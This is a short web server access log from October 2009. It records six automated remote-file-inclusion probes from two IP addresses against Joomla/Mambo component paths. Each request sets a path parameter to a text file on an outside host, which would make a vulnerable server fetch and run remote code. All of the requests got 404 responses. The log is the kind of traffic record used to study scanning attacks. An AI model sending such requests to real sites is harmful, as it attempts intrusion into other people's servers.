125.251.147.194 - - [13/Oct/2009:00:37:37 -0400] "GET /logs/access_log.Q109052600//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:38:05 -0400] "GET //components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:38:05 -0400] "GET /logs//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:38:05 -0400] "GET /logs/access_log.Q109073100//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:00:38:09 -0400] "GET /logs/access_log.Q109052600//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
91.192.20.164 - - [13/Oct/2009:00:38:10 -0400] "GET /logs//components/minibb/index.php?absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
